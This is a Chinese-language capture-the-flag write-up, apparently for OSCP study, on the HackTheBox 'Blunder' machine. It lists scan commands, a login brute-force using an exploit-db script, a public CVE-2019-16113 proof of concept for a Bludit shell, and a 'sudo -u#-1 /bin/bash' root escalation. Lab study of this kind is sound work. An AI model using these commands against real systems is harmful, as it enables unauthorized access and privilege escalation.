OSCP备考_0x28_HackThBox靶机_Linux_blunder

Ethan医生10小时前靶场5

blunder

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.193.124 (扫描UDP)

image.png



gobuster dir -u http://10.129.193.124/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html


image.png0


http://10.129.193.124/todo.txt ,发现有fergus用户

image.png

查看有没有漏洞

image.png

python3 48942.py -l http://10.129.193.124/admin/login.php -u user.txt -p /usr/share/wordlists/my_list/passwd-EN-Top10000.txt


进行爆破

最后发现密码为RolandDeschain




我们获得密码之后还是无法登录

在我们搜索bludit得时候我们看不到rce,然后使用这个脚本,但是要将脚本进行修改才能使用

https://github.com/hg8/CVE-2019-16113-PoC



然后执行脚本就获得shell


image.png

这个密码爆破不了

然后就去另一个版本里面找答案bludit-3.10.0a

然后使用在线的破解工具

hugo,Password120

切换到hugo然后执行sudo -l

发现可以使用/bin/bash

然后使用sudo -u#-1 /bin/bash获得root


标签: OSCP

相关文章

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-31,332/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)nmap -sU --top-ports 100 10.129.3.15...

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.73.179 (扫描TCP)nmap -sU --top-ports 100 10.129.73....

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

名称说明靶机下载链接https://www.vulnhub.com/entry/digitalworldlocal-torment,299/攻击机(kali)ip:192.168.233.168靶机(...

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。